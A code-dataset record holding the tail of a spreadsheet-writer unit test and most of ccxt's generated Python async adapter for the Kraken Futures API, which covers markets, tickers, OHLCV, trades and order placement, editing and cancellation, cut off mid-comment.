self.worksheet._write_sheet_view()
exp = (
"""<sheetView showRowColHeaders="0" tabSelected="1" workbookViewId="0"/>"""
)
got = self.fh.getvalue()
self.assertEqual(got, exp)
| [
"[email protected]"
] | |
34ccd95eb23058af1f6b7eed3183fba1b29c0fe7 | af2b03bd1f7c54059b04687a825cf774b073351a | /python/ccxt/async_support/krakenfutures.py | 65ee6cb4d35f0a519b6f9d1316995705580f8b76 | [
"MIT"
] | permissive | street2geek/ccxt | 2b480526758b0629bad95c756e6c645964babe94 | e880b59112717b693985f5e4beb88cdefaab9e57 | refs/heads/master | 2023-05-25T16:50:07.920596 | 2023-05-16T11:51:48 | 2023-05-16T11:51:48 | 148,709,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82,024 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
from ccxt.abstract.krakenfutures import ImplicitAPI
import hashlib
from ccxt.base.types import OrderSide
from typing import Optional
from typing import List
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import OrderImmediatelyFillable
from ccxt.base.errors import OrderNotFillable
from ccxt.base.errors import DuplicateOrderId
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import InvalidNonce
from ccxt.base.errors import AuthenticationError
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class krakenfutures(Exchange, ImplicitAPI):
def describe(self):
return self.deep_extend(super(krakenfutures, self).describe(), {
'id': 'krakenfutures',
'name': 'Kraken Futures',
'countries': ['US'],
'version': 'v3',
'userAgent': None,
'rateLimit': 600,
'pro': True,
'has': {
'CORS': None,
'spot': False,
'margin': False,
'swap': True,
'future': True,
'option': False,
'cancelAllOrders': True,
'cancelOrder': True,
'createMarketOrder': False,
'createOrder': True,
'editOrder': True,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchClosedOrders': None, # https://support.kraken.com/hc/en-us/articles/360058243651-Historical-orders
'fetchFundingHistory': None,
'fetchFundingRate': False,
'fetchFundingRateHistory': True,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchIsolatedPositions': False,
'fetchLeverageTiers': True,
'fetchMarketLeverageTiers': 'emulated',
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': False,
'fetchOrderBook': True,
'fetchOrders': False,
'fetchPositions': True,
'fetchPremiumIndexOHLCV': False,
'fetchTickers': True,
'fetchTrades': True,
'setLeverage': False,
'setMarginMode': False,
'transfer': True,
},
'urls': {
'test': {
'public': 'https://demo-futures.kraken.com/derivatives/api/',
'private': 'https://demo-futures.kraken.com/derivatives/api/',
'www': 'https://demo-futures.kraken.com',
},
'logo': 'https://user-images.githubusercontent.com/24300605/81436764-b22fd580-9172-11ea-9703-742783e6376d.jpg',
'api': {
'charts': 'https://futures.kraken.com/api/charts/',
'history': 'https://futures.kraken.com/api/history/',
'feeschedules': 'https://futures.kraken.com/api/feeschedules/',
'public': 'https://futures.kraken.com/derivatives/api/',
'private': 'https://futures.kraken.com/derivatives/api/',
},
'www': 'https://futures.kraken.com/',
'doc': [
'https://support.kraken.com/hc/en-us/categories/360001806372-Futures-API',
],
'fees': 'https://support.kraken.com/hc/en-us/articles/360022835771-Transaction-fees-and-rebates-for-Kraken-Futures',
'referral': None,
},
'api': {
'public': {
'get': [
'instruments',
'orderbook',
'tickers',
'history',
'historicalfundingrates',
],
},
'private': {
'get': [
'openpositions',
'notifications',
'accounts',
'openorders',
'recentorders',
'fills',
'transfers',
],
'post': [
'sendorder',
'editorder',
'cancelorder',
'transfer',
'batchorder',
'cancelallorders',
'cancelallordersafter',
'withdrawal', # for futures wallet -> kraken spot wallet
],
},
'charts': {
'get': [
'{price_type}/{symbol}/{interval}',
],
},
'history': {
'get': [
'orders',
'executions',
'triggers',
'accountlogcsv',
'market/{symbol}/orders',
'market/{symbol}/executions',
],
},
'feeschedules': {
'get': [
'volumes',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': self.parse_number('-0.0002'),
'taker': self.parse_number('0.00075'),
},
},
'exceptions': {
'exact': {
'apiLimitExceeded': RateLimitExceeded,
'marketUnavailable': ExchangeNotAvailable,
'requiredArgumentMissing': BadRequest,
'unavailable': ExchangeNotAvailable,
'authenticationError': AuthenticationError,
                    'accountInactive': ExchangeError, # When account has no trade history / no order history. Should this error be ignored in some cases?
'invalidAccount': BadRequest, # the fromAccount or the toAccount are invalid
'invalidAmount': BadRequest,
'insufficientFunds': InsufficientFunds,
'Bad Request': BadRequest, # The URL contains invalid characters.(Please encode the json URL parameter)
'Unavailable': InsufficientFunds, # Insufficient funds in Futures account [withdraw]
},
'broad': {
'invalidArgument': BadRequest,
'nonceBelowThreshold': InvalidNonce,
'nonceDuplicate': InvalidNonce,
},
},
'precisionMode': TICK_SIZE,
'options': {
'access': {
'history': {
'GET': {
'orders': 'private',
'executions': 'private',
'triggers': 'private',
'accountlogcsv': 'private',
},
},
},
'settlementCurrencies': {
'flex': ['USDT', 'BTC', 'USD', 'GBP', 'EUR', 'USDC'],
},
'symbol': {
'quoteIds': ['USD', 'XBT'],
'reversed': False,
},
'versions': {
'public': {
'GET': {
'historicalfundingrates': 'v4',
},
},
'charts': {
'GET': {
'{price_type}/{symbol}/{interval}': 'v1',
},
},
'history': {
'GET': {
'orders': 'v2',
'executions': 'v2',
'triggers': 'v2',
'accountlogcsv': 'v2',
},
},
},
},
'timeframes': {
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'12h': '12h',
'1d': '1d',
'1w': '1w',
},
})
async def fetch_markets(self, params={}):
"""
        Fetches the available trading markets from the exchange; multi-collateral markets are returned as linear markets, but can be settled in multiple currencies
see https://docs.futures.kraken.com/#http-api-trading-v3-api-instrument-details-get-instruments
:param dict params: exchange specific params
:returns: An array of market structures
"""
response = await self.publicGetInstruments(params)
#
# {
# "result": "success",
# "instruments": [
# {
# "symbol": "fi_ethusd_180928",
# "type": "futures_inverse", # futures_vanilla # spot index
# "underlying": "rr_ethusd",
# "lastTradingTime": "2018-09-28T15:00:00.000Z",
# "tickSize": 0.1,
# "contractSize": 1,
# "tradeable": True,
# "marginLevels": [
# {
# "contracts":0,
# "initialMargin":0.02,
# "maintenanceMargin":0.01
# },
# {
# "contracts":250000,
# "initialMargin":0.04,
# "maintenanceMargin":0.02
# },
# ...
# ],
# "isin": "GB00JVMLMP88",
# "retailMarginLevels": [
# {
# "contracts": 0,
# "initialMargin": 0.5,
# "maintenanceMargin": 0.25
# }
# ],
# "tags": [],
# },
# {
# "symbol": "in_xbtusd",
# "type": "spot index",
# "tradeable":false
# }
# ]
# "serverTime": "2018-07-19T11:32:39.433Z"
# }
#
instruments = self.safe_value(response, 'instruments', [])
result = []
for i in range(0, len(instruments)):
market = instruments[i]
id = self.safe_string(market, 'symbol')
marketType = self.safe_string(market, 'type')
type = None
index = (marketType.find(' index') >= 0)
linear = None
inverse = None
expiry = None
if not index:
linear = (marketType.find('_vanilla') >= 0)
inverse = not linear
settleTime = self.safe_string(market, 'lastTradingTime')
type = 'swap' if (settleTime is None) else 'future'
expiry = self.parse8601(settleTime)
else:
type = 'index'
swap = (type == 'swap')
future = (type == 'future')
symbol = id
split = id.split('_')
splitMarket = self.safe_string(split, 1)
baseId = splitMarket[0:len(splitMarket) - 3]
quoteId = 'usd' # always USD
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
# swap == perpetual
settle = None
settleId = None
amountPrecision = self.parse_number(self.parse_precision(self.safe_string(market, 'contractValueTradePrecision', '0')))
pricePrecision = self.safe_number(market, 'tickSize')
contract = (swap or future or index)
swapOrFutures = (swap or future)
if swapOrFutures:
exchangeType = self.safe_string(market, 'type')
if exchangeType == 'futures_inverse':
settle = base
settleId = baseId
inverse = True
else:
settle = quote
settleId = quoteId
inverse = False
linear = not inverse
symbol = base + '/' + quote + ':' + settle
if future:
symbol = symbol + '-' + self.yymmdd(expiry)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': settle,
'baseId': baseId,
'quoteId': quoteId,
'settleId': settleId,
'type': type,
'spot': False,
'margin': False,
'swap': swap,
'future': future,
'option': False,
'index': index,
'active': None,
'contract': contract,
'linear': linear,
'inverse': inverse,
'contractSize': self.safe_number(market, 'contractSize'),
'maintenanceMarginRate': None,
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': None,
'optionType': None,
'precision': {
'amount': amountPrecision,
'price': pricePrecision,
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
settlementCurrencies = self.options['settlementCurrencies']['flex']
currencies = []
for i in range(0, len(settlementCurrencies)):
code = settlementCurrencies[i]
currencies.append({
'id': code.lower(),
'numericId': None,
'code': code,
'precision': None,
})
self.currencies = self.deep_extend(currencies, self.currencies)
return result
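    # Example of the symbol construction above (added): the inverse perpetual
    # 'pi_xbtusd' becomes 'BTC/USD:BTC', while a dated inverse future such as
    # 'fi_xbtusd_180615' becomes 'BTC/USD:BTC-180615' (yymmdd of the expiry).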
async def fetch_order_book(self, symbol: str, limit: Optional[int] = None, params={}):
"""
        Fetches the order book (the open bids and asks) for a market
:param str symbol: Unified market symbol
:param int|None limit: Not used by krakenfutures
:param dict params: exchange specific params
:returns: An `order book structure <https://docs.ccxt.com/#/?id=order-book-structure>`
"""
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = await self.publicGetOrderbook(self.extend(request, params))
#
# {
# "result": "success",
# "serverTime": "2016-02-25T09:45:53.818Z",
# "orderBook": {
# "bids": [
# [
# 4213,
# 2000,
# ],
# [
# 4210,
# 4000,
# ],
# ...
# ],
# "asks": [
# [
# 4218,
# 4000,
# ],
# [
# 4220,
# 5000,
# ],
# ...
# ],
# },
# }
#
timestamp = self.parse8601(response['serverTime'])
return self.parse_order_book(response['orderBook'], symbol, timestamp)
async def fetch_tickers(self, symbols: Optional[List[str]] = None, params={}):
await self.load_markets()
response = await self.publicGetTickers(params)
#
# {
# result: 'success',
# tickers: [
# {
# tag: 'semiannual', # 'month', 'quarter', 'perpetual', 'semiannual',
# pair: 'ETH:USD',
# symbol: 'fi_ethusd_220624',
# markPrice: '2925.72',
# bid: '2923.8',
# bidSize: '16804',
# ask: '2928.65',
# askSize: '1339',
# vol24h: '860493',
# openInterest: '3023363.00000000',
# open24h: '3021.25',
# indexPrice: '2893.71',
# last: '2942.25',
# lastTime: '2022-02-18T14:08:15.578Z',
# lastSize: '151',
# suspended: False
# },
# {
# symbol: 'in_xbtusd', # 'rr_xbtusd',
# last: '40411',
# lastTime: '2022-02-18T14:16:28.000Z'
# },
# ...
# ],
# serverTime: '2022-02-18T14:16:29.440Z'
# }
#
tickers = self.safe_value(response, 'tickers')
return self.parse_tickers(tickers, symbols)
def parse_ticker(self, ticker, market=None):
#
# {
# tag: 'semiannual', # 'month', 'quarter', 'perpetual', 'semiannual',
# pair: 'ETH:USD',
# symbol: 'fi_ethusd_220624',
# markPrice: '2925.72',
# bid: '2923.8',
# bidSize: '16804',
# ask: '2928.65',
# askSize: '1339',
# vol24h: '860493',
# openInterest: '3023363.00000000',
# open24h: '3021.25',
# indexPrice: '2893.71',
# last: '2942.25',
# lastTime: '2022-02-18T14:08:15.578Z',
# lastSize: '151',
# suspended: False
# }
#
# {
# symbol: 'in_xbtusd', # 'rr_xbtusd',
# last: '40411',
# lastTime: '2022-02-18T14:16:28.000Z'
# }
#
marketId = self.safe_string(ticker, 'symbol')
market = self.safe_market(marketId, market)
symbol = market['symbol']
timestamp = self.parse8601(self.safe_string(ticker, 'lastTime'))
open = self.safe_string(ticker, 'open24h')
last = self.safe_string(ticker, 'last')
change = Precise.string_sub(last, open)
percentage = Precise.string_mul(Precise.string_div(change, open), '100')
average = Precise.string_div(Precise.string_add(open, last), '2')
volume = self.safe_string(ticker, 'vol24h')
baseVolume = None
quoteVolume = None
isIndex = self.safe_value(market, 'index', False)
if not isIndex:
if market['linear']:
baseVolume = volume
elif market['inverse']:
quoteVolume = volume
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': self.safe_string(ticker, 'bid'),
'bidVolume': self.safe_string(ticker, 'bidSize'),
'ask': self.safe_string(ticker, 'ask'),
'askVolume': self.safe_string(ticker, 'askSize'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': average,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
})
async def fetch_ohlcv(self, symbol: str, timeframe='1m', since: Optional[int] = None, limit: Optional[int] = None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'price_type': self.safe_string(params, 'price', 'trade'),
'interval': self.timeframes[timeframe],
}
params = self.omit(params, 'price')
if since is not None:
duration = self.parse_timeframe(timeframe)
request['from'] = self.parse_to_int(since / 1000)
if limit is None:
limit = 5000
elif limit > 5000:
raise BadRequest(self.id + ' fetchOHLCV() limit cannot exceed 5000')
toTimestamp = self.sum(request['from'], limit * duration - 1)
currentTimestamp = self.seconds()
request['to'] = min(toTimestamp, currentTimestamp)
elif limit is not None:
if limit > 5000:
raise BadRequest(self.id + ' fetchOHLCV() limit cannot exceed 5000')
duration = self.parse_timeframe(timeframe)
request['to'] = self.seconds()
request['from'] = self.parse_to_int(request['to'] - (duration * limit))
response = await self.chartsGetPriceTypeSymbolInterval(self.extend(request, params))
#
# {
# "candles": [
# {
# "time": 1645198500000,
# "open": "309.15000000000",
# "high": "309.15000000000",
# "low": "308.70000000000",
# "close": "308.85000000000",
# "volume": 0
# }
# ],
# "more_candles": True
# }
#
candles = self.safe_value(response, 'candles')
return self.parse_ohlcvs(candles, market, timeframe, since, limit)
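    # Hedged example (added; values are illustrative assumptions): a call like
    # fetch_ohlcv('BTC/USD:BTC', '1h', since=1645198500000, limit=24)
    # resolves to charts GET trade/pi_xbtusd/1h with from=1645198500 and
    # to=from + 24*3600 - 1 (capped at the current time), i.e. at most 24
    # hourly candles of the 'trade' price type.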
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "time": 1645198500000,
# "open": "309.15000000000",
# "high": "309.15000000000",
# "low": "308.70000000000",
# "close": "308.85000000000",
# "volume": 0
# }
#
return [
self.safe_integer(ohlcv, 'time'), # unix timestamp in milliseconds
self.safe_number(ohlcv, 'open'), # open price
self.safe_number(ohlcv, 'high'), # highest price
self.safe_number(ohlcv, 'low'), # lowest price
self.safe_number(ohlcv, 'close'), # close price
self.safe_number(ohlcv, 'volume'), # trading volume, None for mark or index price
]
async def fetch_trades(self, symbol: str, since: Optional[int] = None, limit: Optional[int] = None, params={}):
"""
        Fetch the public trade history for a market
:param str symbol: Unified CCXT market symbol
:param int|None since: Timestamp in ms of earliest trade. Not used by krakenfutures except in combination with params.until
:param int|None limit: Total number of trades, cannot exceed 100
:param dict params: Exchange specific params
:param int|None params['until']: Timestamp in ms of latest trade
:returns: An array of `trade structures <https://docs.ccxt.com/#/?id=trade-structure>`
"""
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
until = self.safe_integer(params, 'until')
if until is not None:
request['lastTime'] = self.iso8601(until)
#
# {
# "result": "success",
# "history": [
# {
# "time": "2022-03-18T04:55:37.692Z",
# "trade_id": 100,
# "price": 0.7921,
# "size": 1068,
# "side": "sell",
# "type": "fill",
# "uid": "6c5da0b0-f1a8-483f-921f-466eb0388265"
# },
# ...
# ],
# "serverTime": "2022-03-18T06:39:18.056Z"
# }
#
response = await self.publicGetHistory(self.extend(request, params))
history = self.safe_value(response, 'history')
return self.parse_trades(history, market, since, limit)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "time": "2019-02-14T09:25:33.920Z",
# "trade_id": 100,
# "price": 3574,
# "size": 100,
# "side": "buy",
# "type": "fill" # fill, liquidation, assignment, termination
# "uid": "11c3d82c-9e70-4fe9-8115-f643f1b162d4"
# }
#
# fetchMyTrades(private)
#
# {
# "fillTime": "2016-02-25T09:47:01.000Z",
# "order_id": "c18f0c17-9971-40e6-8e5b-10df05d422f0",
# "fill_id": "522d4e08-96e7-4b44-9694-bfaea8fe215e",
# "cliOrdId": "d427f920-ec55-4c18-ba95-5fe241513b30", # OPTIONAL
# "symbol": "fi_xbtusd_180615",
# "side": "buy",
# "size": 2000,
# "price": 4255,
# "fillType": "maker" # taker, takerAfterEdit, maker, liquidation, assignee
# }
#
# execution report(createOrder, editOrder)
#
# {
# "executionId": "e1ec9f63-2338-4c44-b40a-43486c6732d7",
# "price": 7244.5,
# "amount": 10,
# "orderPriorEdit": null,
# "orderPriorExecution": {
# "orderId": "61ca5732-3478-42fe-8362-abbfd9465294",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 10,
# "filled": 0,
# "limitPrice": 7500,
# "reduceOnly": False,
# "timestamp": "2019-12-11T17:17:33.888Z",
# "lastUpdateTimestamp": "2019-12-11T17:17:33.888Z"
# },
# "takerReducedQuantity": null,
# "type": "EXECUTION"
# }
#
timestamp = self.parse8601(self.safe_string_2(trade, 'time', 'fillTime'))
price = self.safe_string(trade, 'price')
amount = self.safe_string_2(trade, 'size', 'amount', '0.0')
id = self.safe_string_2(trade, 'uid', 'fill_id')
if id is None:
id = self.safe_string(trade, 'executionId')
order = self.safe_string(trade, 'order_id')
symbolId = self.safe_string(trade, 'symbol')
side = self.safe_string(trade, 'side')
type = None
priorEdit = self.safe_value(trade, 'orderPriorEdit')
priorExecution = self.safe_value(trade, 'orderPriorExecution')
if priorExecution is not None:
order = self.safe_string(priorExecution, 'orderId')
symbolId = self.safe_string(priorExecution, 'symbol')
side = self.safe_string(priorExecution, 'side')
type = self.safe_string(priorExecution, 'type')
elif priorEdit is not None:
order = self.safe_string(priorEdit, 'orderId')
symbolId = self.safe_string(priorEdit, 'symbol')
side = self.safe_string(priorEdit, 'type')
type = self.safe_string(priorEdit, 'type')
if type is not None:
type = self.parse_order_type(type)
symbol = None
if symbolId is not None:
market = self.safe_value(self.markets_by_id, symbolId)
if market is None:
symbol = symbolId
symbol = self.safe_string(market, 'symbol', symbol)
cost = None
if (amount is not None) and (price is not None) and (market is not None):
linear = self.safe_value(market, 'linear')
if linear:
cost = Precise.string_mul(amount, price) # in quote
else:
cost = Precise.string_div(amount, price) # in base
contractSize = self.safe_string(market, 'contractSize')
cost = Precise.string_mul(cost, contractSize)
takerOrMaker = None
fillType = self.safe_string(trade, 'fillType')
if fillType is not None:
if fillType.find('taker') >= 0:
takerOrMaker = 'taker'
elif fillType.find('maker') >= 0:
takerOrMaker = 'maker'
return self.safe_trade({
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': order,
'type': type,
'side': side,
'takerOrMaker': takerOrMaker,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
})
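    # Worked example for the cost computation above (added sketch): with
    # contractSize 1, amount 2000 and price 4000, an inverse contract fill
    # costs 2000 / 4000 * 1 = 0.5 in the base currency, while a linear
    # contract fill costs 2000 * 4000 * 1 = 8000000 in the quote currency.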
async def create_order(self, symbol: str, type, side: OrderSide, amount, price=None, params={}):
"""
Create an order on the exchange
:param str symbol: market symbol
        :param str type: One of 'limit', 'market', 'stp' (stop) or 'take_profit'
        :param str side: buy or sell
        :param float amount: Contract quantity
:param float price: Limit order price
:param float|None params['stopPrice']: The stop price associated with a stop or take profit order, Required if orderType is stp or take_profit, Must not have more than 2 decimal places, Note that for stop orders, limitPrice denotes the worst price at which the stop or take_profit order can get filled at. If no limitPrice is provided the stop or take_profit order will trigger a market order,
:param bool|None params['reduceOnly']: Set if you wish the order to only reduce an existing position, Any order which increases an existing position will be rejected, Default False,
:param bool|None params['postOnly']: Set if you wish to make a postOnly order, Default False
:param str|None params['triggerSignal']: If placing a stp or take_profit, the signal used for trigger, One of: 'mark', 'index', 'last', last is market price
:param str|None params['cliOrdId']: UUID The order identity that is specified from the user, It must be globally unique
:param str|None params['clientOrderId']: UUID The order identity that is specified from the user, It must be globally unique
"""
await self.load_markets()
type = self.safe_string(params, 'orderType', type)
timeInForce = self.safe_string(params, 'timeInForce')
stopPrice = self.safe_string(params, 'stopPrice')
postOnly = False
postOnly, params = self.handle_post_only(type == 'market', type == 'post', params)
clientOrderId = self.safe_string_2(params, 'clientOrderId', 'cliOrdId')
params = self.omit(params, ['clientOrderId', 'cliOrdId'])
if (type == 'stp' or type == 'take_profit') and stopPrice is None:
raise ArgumentsRequired(self.id + ' createOrder requires params.stopPrice when type is ' + type)
if stopPrice is not None and type != 'take_profit':
type = 'stp'
elif postOnly:
type = 'post'
elif timeInForce == 'ioc':
type = 'ioc'
elif type == 'limit':
type = 'lmt'
elif type == 'market':
type = 'mkt'
request = {
'orderType': type,
'symbol': self.market_id(symbol),
'side': side,
'size': amount,
}
if price is not None:
request['limitPrice'] = price
if clientOrderId is not None:
request['cliOrdId'] = clientOrderId
response = await self.privatePostSendorder(self.extend(request, params))
#
# {
# "result": "success",
# "sendStatus": {
# "order_id": "salf320-e337-47ac-b345-30sdfsalj",
# "status": "placed",
# "receivedTime": "2022-02-28T19:32:17.122Z",
# "orderEvents": [
# {
# "order": {
# "orderId": "salf320-e337-47ac-b345-30sdfsalj",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xrpusd",
# "side": "buy",
# "quantity": 1,
# "filled": 0,
# "limitPrice": 0.7,
# "reduceOnly": False,
# "timestamp": "2022-02-28T19:32:17.122Z",
# "lastUpdateTimestamp": "2022-02-28T19:32:17.122Z"
# },
# "reducedQuantity": null,
# "type": "PLACE"
# }
# ]
# },
# "serverTime": "2022-02-28T19:32:17.122Z"
# }
#
sendStatus = self.safe_value(response, 'sendStatus')
status = self.safe_string(sendStatus, 'status')
self.verify_order_action_success(status, 'createOrder', ['filled'])
return self.parse_order(sendStatus)
async def edit_order(self, id: str, symbol, type, side, amount=None, price=None, params={}):
"""
Edit an open order on the exchange
:param str id: order id
:param str symbol: Not used by Krakenfutures
:param str type: Not used by Krakenfutures
:param str side: Not used by Krakenfutures
:param float|None amount: Order size
:param float|None price: Price to fill order at
:param dict params: Exchange specific params
:returns: An `order structure <https://docs.ccxt.com/#/?id=order-structure>`
"""
await self.load_markets()
request = {
'orderId': id,
}
if amount is not None:
request['size'] = amount
if price is not None:
request['limitPrice'] = price
response = await self.privatePostEditorder(self.extend(request, params))
status = self.safe_string(response['editStatus'], 'status')
self.verify_order_action_success(status, 'editOrder', ['filled'])
order = self.parse_order(response['editStatus'])
return self.extend({'info': response}, order)
async def cancel_order(self, id: str, symbol: Optional[str] = None, params={}):
"""
:param str id: Order id
:param str|None symbol: Not used by Krakenfutures
:param dict params: Exchange specific params
:returns: An `order structure <https://docs.ccxt.com/#/?id=order-structure>`
"""
await self.load_markets()
response = await self.privatePostCancelorder(self.extend({'order_id': id}, params))
status = self.safe_string(self.safe_value(response, 'cancelStatus', {}), 'status')
self.verify_order_action_success(status, 'cancelOrder')
order = {}
if 'cancelStatus' in response:
order = self.parse_order(response['cancelStatus'])
return self.extend({'info': response}, order)
async def cancel_all_orders(self, symbol: Optional[str] = None, params={}):
"""
Cancels all orders on the exchange, including trigger orders
:param str symbol: Unified market symbol
:param dict params: Exchange specific params
:returns: Response from exchange api
"""
request = {}
if symbol is not None:
request['symbol'] = self.market_id(symbol)
response = await self.privatePostCancelallorders(self.extend(request, params))
return response
async def fetch_open_orders(self, symbol: Optional[str] = None, since: Optional[int] = None, limit: Optional[int] = None, params={}):
"""
Gets all open orders, including trigger orders, for an account from the exchange api
:param str symbol: Unified market symbol
:param int since: Timestamp(ms) of earliest order.(Not used by kraken api but filtered internally by CCXT)
:param int limit: How many orders to return.(Not used by kraken api but filtered internally by CCXT)
:param dict params: Exchange specific parameters
:returns: An array of `order structures <https://docs.ccxt.com/#/?id=order-structure>`
"""
await self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
response = await self.privateGetOpenorders(params)
orders = self.safe_value(response, 'openOrders', [])
return self.parse_orders(orders, market, since, limit)
def parse_order_type(self, orderType):
map = {
'lmt': 'limit',
'mkt': 'market',
'post': 'limit',
'ioc': 'market',
}
return self.safe_string(map, orderType, orderType)
def verify_order_action_success(self, status, method, omit=[]):
errors = {
'invalidOrderType': InvalidOrder,
'invalidSide': InvalidOrder,
'invalidSize': InvalidOrder,
'invalidPrice': InvalidOrder,
'insufficientAvailableFunds': InsufficientFunds,
'selfFill': ExchangeError,
'tooManySmallOrders': ExchangeError,
'maxPositionViolation': BadRequest,
'marketSuspended': ExchangeNotAvailable,
'marketInactive': ExchangeNotAvailable,
'clientOrderIdAlreadyExist': DuplicateOrderId,
'clientOrderIdTooLong': BadRequest,
'outsidePriceCollar': InvalidOrder,
'postWouldExecute': OrderImmediatelyFillable,  # the unplaced order could actually be parsed (with status = "rejected"), but there is a specific error for this
'iocWouldNotExecute': OrderNotFillable,  # same note as above
'wouldNotReducePosition': ExchangeError,
'orderForEditNotFound': OrderNotFound,
'orderForEditNotAStop': InvalidOrder,
'filled': OrderNotFound,
'notFound': OrderNotFound,
}
if (status in errors) and not self.in_array(status, omit):
raise errors[status](self.id + ': ' + method + ' failed due to ' + status)
def parse_order_status(self, status):
statuses = {
'placed': 'open', # the order was placed successfully
'cancelled': 'canceled', # the order was cancelled successfully
'invalidOrderType': 'rejected', # the order was not placed because orderType is invalid
'invalidSide': 'rejected', # the order was not placed because side is invalid
'invalidSize': 'rejected', # the order was not placed because size is invalid
'invalidPrice': 'rejected', # the order was not placed because limitPrice and/or stopPrice are invalid
'insufficientAvailableFunds': 'rejected', # the order was not placed because available funds are insufficient
'selfFill': 'rejected', # the order was not placed because it would be filled against an existing order belonging to the same account
'tooManySmallOrders': 'rejected', # the order was not placed because the number of small open orders would exceed the permissible limit
'maxPositionViolation': 'rejected',  # the order would cause you to exceed your maximum position in this contract.
'marketSuspended': 'rejected', # the order was not placed because the market is suspended
'marketInactive': 'rejected', # the order was not placed because the market is inactive
'clientOrderIdAlreadyExist': 'rejected', # the specified client id already exist
'clientOrderIdTooLong': 'rejected', # the client id is longer than the permissible limit
'outsidePriceCollar': 'rejected', # the limit order crosses the spread but is an order of magnitude away from the mark price - fat finger control
# Should the next two be 'expired' ?
'postWouldExecute': 'rejected', # the post-only order would be filled upon placement, thus is cancelled
'iocWouldNotExecute': 'rejected', # the immediate-or-cancel order would not execute.
'wouldNotReducePosition': 'rejected', # the reduce only order would not reduce position.
'edited': 'open', # the order was edited successfully
'orderForEditNotFound': 'rejected', # the requested order for edit has not been found
'orderForEditNotAStop': 'rejected', # the supplied stopPrice cannot be applied because order is not a stop order
'filled': 'closed', # the order was found completely filled and could not be cancelled
'notFound': 'rejected', # the order was not found, either because it had already been cancelled or it never existed
'untouched': 'open', # the entire size of the order is unfilled
'partiallyFilled': 'open', # the size of the order is partially but not entirely filled
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# LIMIT
#
# {
# "order_id": "179f9af8-e45e-469d-b3e9-2fd4675cb7d0",
# "status": "placed",
# "receivedTime": "2019-09-05T16:33:50.734Z",
# "orderEvents": [
# {
# "uid": "614a5298-0071-450f-83c6-0617ce8c6bc4",
# "order": {
# "orderId": "179f9af8-e45e-469d-b3e9-2fd4675cb7d0",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 10000,
# "filled": 0,
# "limitPrice": 9400,
# "reduceOnly": False,
# "timestamp": "2019-09-05T16:33:50.734Z",
# "lastUpdateTimestamp": "2019-09-05T16:33:50.734Z"
# },
# "reducedQuantity": null,
# "reason": "WOULD_NOT_REDUCE_POSITION", # REJECTED
# "type": "PLACE"
# }
# ]
# }
#
# CONDITIONAL
#
# {
# "order_id": "1abfd3c6-af93-4b30-91cc-e4a93797f3f5",
# "status": "placed",
# "receivedTime": "2019-12-05T10:20:50.701Z",
# "orderEvents": [
# {
# "orderTrigger": {
# "uid": "1abfd3c6-af93-4b30-91cc-e4a93797f3f5",
# "clientId":null,
# "type": "lmt", # "ioc" if stop market
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity":10,
# "limitPrice":15000,
# "triggerPrice":9500,
# "triggerSide": "trigger_below",
# "triggerSignal": "mark_price",
# "reduceOnly":false,
# "timestamp": "2019-12-05T10:20:50.701Z",
# "lastUpdateTimestamp": "2019-12-05T10:20:50.701Z"
# },
# "type": "PLACE"
# }
# ]
# }
#
# EXECUTION
#
# {
# "order_id": "61ca5732-3478-42fe-8362-abbfd9465294",
# "status": "placed",
# "receivedTime": "2019-12-11T17:17:33.888Z",
# "orderEvents": [
# {
# "executionId": "e1ec9f63-2338-4c44-b40a-43486c6732d7",
# "price": 7244.5,
# "amount": 10,
# "orderPriorEdit": null,
# "orderPriorExecution": {
